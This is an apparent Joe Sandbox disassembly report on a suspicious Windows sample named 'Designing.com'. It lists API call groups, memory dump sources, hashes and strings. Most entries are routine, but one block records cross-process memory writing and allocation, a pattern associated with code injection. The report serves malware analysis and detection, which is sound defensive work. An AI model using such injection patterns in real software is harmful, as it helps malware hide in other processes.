                                                                                                                                                                              • Instruction Fuzzy Hash: 71F0497520430AAFDB210FA6AC4DF563FAEEF897A0F510414FA45EB2A0CA71DC549B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CCB
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CD8
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CE5
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CF2
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10CFF
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00E10B24,?,00E13D41,?,00000001,00DE3AF4,?), ref: 00E10D0C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                              • Opcode ID: 94c86d835782e36b95e707ef2c46f72ac5fa864fd3a30d8e869d194bbd6761d1
                                                                                                                                                                              • Instruction ID: eed68367ca010e82d75328d4fb69bb3ead5b08d074cdf60e42ae86f4ea03e25f
                                                                                                                                                                              • Opcode Fuzzy Hash: 94c86d835782e36b95e707ef2c46f72ac5fa864fd3a30d8e869d194bbd6761d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01AE71800B15DFCB30AFAAD980856FBF9BF503193159A3ED19662931C7B0A998DF80
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E065BF
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E065D6
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00E065EE
                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 00E0660A
                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00E06624
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                              • Opcode ID: 1808f17d33658a1459e8dc9cc45c571aa2ba848fbbf2570dafaf0376ca450381
                                                                                                                                                                              • Instruction ID: 96c5d23cfadd1004d48e7e39d40ce5f032ca2a6cca2a964376113d86ebc7a781
                                                                                                                                                                              • Opcode Fuzzy Hash: 1808f17d33658a1459e8dc9cc45c571aa2ba848fbbf2570dafaf0376ca450381
                                                                                                                                                                              • Instruction Fuzzy Hash: F0018630504708AFEB205F21ED4EB967B78FB10705F001559A597710E1DBF5AAA88A50
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAD2
                                                                                                                                                                                • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
                                                                                                                                                                                • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAE4
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDAF6
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDB08
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDB1A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 26828ef3592a3359b70d6bacb317c78ddd505b51f05f29dc700d3c95a4188bc8
                                                                                                                                                                              • Instruction ID: fa3e34a1f49535394517107f2b17d5b1f1f99ad2374261572d79455c6c58f699
                                                                                                                                                                              • Opcode Fuzzy Hash: 26828ef3592a3359b70d6bacb317c78ddd505b51f05f29dc700d3c95a4188bc8
                                                                                                                                                                              • Instruction Fuzzy Hash: E1F0F472A482046F8A24EB95FD85D6777EFEF547507A91C07F049E7601C660FC4087B4
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 00DD262E
                                                                                                                                                                                • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
                                                                                                                                                                                • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
                                                                                                                                                                              • _free.LIBCMT ref: 00DD2640
                                                                                                                                                                              • _free.LIBCMT ref: 00DD2653
                                                                                                                                                                              • _free.LIBCMT ref: 00DD2664
                                                                                                                                                                              • _free.LIBCMT ref: 00DD2675
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 7a668fb63c7a05fd89477c0ee8e87f3b5f79ba7ecd910f23f4d26428f6539701
                                                                                                                                                                              • Instruction ID: ec8c0c790d3b6fae84315d08dd8f67bf29fe2a21898864ad0dcbfb9c5971b358
                                                                                                                                                                              • Opcode Fuzzy Hash: 7a668fb63c7a05fd89477c0ee8e87f3b5f79ba7ecd910f23f4d26428f6539701
                                                                                                                                                                              • Instruction Fuzzy Hash: 82F03070A052118F8605FFAAFC058993765FF34790354054BF418B3375CB304A89AFE4
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __freea$_free
                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                              • API String ID: 3432400110-3206640213
                                                                                                                                                                              • Opcode ID: ccb27d9d1594b91840eee7c2c265982cab3cf66738bfd50114ff47ed135659e1
                                                                                                                                                                              • Instruction ID: a7147ba788455ab7be393c24d77b0f1def413c3fc06af8ff0c0021e542be7c79
                                                                                                                                                                              • Opcode Fuzzy Hash: ccb27d9d1594b91840eee7c2c265982cab3cf66738bfd50114ff47ed135659e1
                                                                                                                                                                              • Instruction Fuzzy Hash: AFD1CF79940206FACB249FA8C855BBABBB1FF45300F2C415BE9429B351D675DD80CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E141FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14229
                                                                                                                                                                                • Part of subcall function 00E141FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E252EE,?,?,00000035,?), ref: 00E14239
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00E25419
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00E2550E
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E255CD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                              • String ID: bn
                                                                                                                                                                              • API String ID: 2854431205-2317007323
                                                                                                                                                                              • Opcode ID: 1cfa777697f2bf03191af55a11c5f5134b28744d0bbcff010d478b2e7cee3404
                                                                                                                                                                              • Instruction ID: a53f1c1cc575ff669e941ab3592a23d3d3b182255d824d4b0c84a371ef149c58
                                                                                                                                                                              • Opcode Fuzzy Hash: 1cfa777697f2bf03191af55a11c5f5134b28744d0bbcff010d478b2e7cee3404
                                                                                                                                                                              • Instruction Fuzzy Hash: 8ED15B71900249DFCB04DF95D891AEDBBB4FF08314F54441DE416BB292DB31AA86CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00DAD253
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: t5$t5$t5
                                                                                                                                                                              • API String ID: 1385522511-3228143211
                                                                                                                                                                              • Opcode ID: 279c2866a335105921e579a4dc8476639d93981834f4f03385b81ea86d135b67
                                                                                                                                                                              • Instruction ID: 13c0665072849a39a5ecf32c8c7bc01972afb075fcb09b7a810eefb9b692006a
                                                                                                                                                                              • Opcode Fuzzy Hash: 279c2866a335105921e579a4dc8476639d93981834f4f03385b81ea86d135b67
                                                                                                                                                                              • Instruction Fuzzy Hash: D1914D75A00206DFCB14CF69C4906A9B7F2FF5A314F24815AD986A7740D731EE82DFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                                                                                                              • String ID: CALLARGARRAY$bn
                                                                                                                                                                              • API String ID: 157775604-1875210186
                                                                                                                                                                              • Opcode ID: 6c2b4cb0719886a763bdb589ecbaf3124083ac130d547bc6e44de9221ff34f4c
                                                                                                                                                                              • Instruction ID: 2fb9dad24f904874fb5fa84bf7f8fbef595148dfba5d11bd8ec604f05d494112
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c2b4cb0719886a763bdb589ecbaf3124083ac130d547bc6e44de9221ff34f4c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0641AD72A00219DFCB00DFA9D8859EEBBF5FF59324B105229E406B7261E7709D81CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E0BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E02B1D,?,?,00000034,00000800,?,00000034), ref: 00E0BDF4
                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E030AD
                                                                                                                                                                                • Part of subcall function 00E0BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E02B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E0BDBF
                                                                                                                                                                                • Part of subcall function 00E0BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E0BD1C
                                                                                                                                                                                • Part of subcall function 00E0BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E02AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E0BD2C
                                                                                                                                                                                • Part of subcall function 00E0BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E02AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E0BD42
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E0311A
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E03167
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                              • Opcode ID: 0c348b6d20ad78f42ca8ce67ff0c74d79ae88ce23504db47fe33e668da416a8e
                                                                                                                                                                              • Instruction ID: 559249c14ae477219610d7f06ac5a389df1c11e71d50b62118260bef5c543368
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c348b6d20ad78f42ca8ce67ff0c74d79ae88ce23504db47fe33e668da416a8e
                                                                                                                                                                              • Instruction Fuzzy Hash: B441167690121CAEDB11DBA4CD85AEEBBB8EF49704F005095FA45B7180DB706F89CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\124531\Designing.com,00000104), ref: 00DD1AD9
                                                                                                                                                                              • _free.LIBCMT ref: 00DD1BA4
                                                                                                                                                                              • _free.LIBCMT ref: 00DD1BAE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                              • API String ID: 2506810119-898694156
                                                                                                                                                                              • Opcode ID: cb45ce75e728a156de48d6e7d5fc4741f056169dc918b7ef5dfc85d363c3029e
                                                                                                                                                                              • Instruction ID: ea58fa5af564f6b39de0b5579c5021a73160f8869888e17043ce58e9d0279280
                                                                                                                                                                              • Opcode Fuzzy Hash: cb45ce75e728a156de48d6e7d5fc4741f056169dc918b7ef5dfc85d363c3029e
                                                                                                                                                                              • Instruction Fuzzy Hash: C0318175A00258BFCB21DB99DC85D9EBBBCEB85710B1541ABF504A7321E7708E45CBB0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E0CBB1
                                                                                                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00E0CBF7
                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E729C0,01706A50), ref: 00E0CC40
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                                                                              • Opcode ID: c7c194e9da35c8d52e549e6dc5aa12ef9ae3bd8732676c99e90f39b0668ff4e7
                                                                                                                                                                              • Instruction ID: 79bb8b241d1c8c09c512652ad4333d5b1c0821ced392d5c6285528de9e288048
                                                                                                                                                                              • Opcode Fuzzy Hash: c7c194e9da35c8d52e549e6dc5aa12ef9ae3bd8732676c99e90f39b0668ff4e7
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A4180712043029FE720DF24D885B6ABBE8EF85714F244B1DF5A5A72D1DB30A984CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E3DCD0,00000000,?,?,?,?), ref: 00E34F48
                                                                                                                                                                              • GetWindowLongW.USER32 ref: 00E34F65
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E34F75
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                              • Opcode ID: 6d661d61474cf753c94a0de163fb7898410311afcbc40f43a412a5a9106b281a
                                                                                                                                                                              • Instruction ID: 480028a938c1d8e8511b8e4c404966c43c198f62fde2b771f01a0c65e8a91cad
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d661d61474cf753c94a0de163fb7898410311afcbc40f43a412a5a9106b281a
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E318F71214205AFDB218E78DC49BEA7BA9EF09338F246715F979B21E0C770AC50DB60
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E23DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E23AD4,?,?), ref: 00E23DD5
                                                                                                                                                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E23AD7
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E23AF8
                                                                                                                                                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00E23B63
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                                                              • API String ID: 946324512-2422070025
                                                                                                                                                                              • Opcode ID: 974acd70fb027e92cb6148330422281d34b9c1b1202f025ddcea35a488aae7fd
                                                                                                                                                                              • Instruction ID: dc5ee245a233ef6cf55b897c7456f9c8466dc56dd7b305149b13ff9d95a6f0fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 974acd70fb027e92cb6148330422281d34b9c1b1202f025ddcea35a488aae7fd
                                                                                                                                                                              • Instruction Fuzzy Hash: AD31F5392002159FCB20CF38E485EA97BF1EF14318F249159E816AB792C735EE46CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E349DC
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E349F0
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E34A14
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
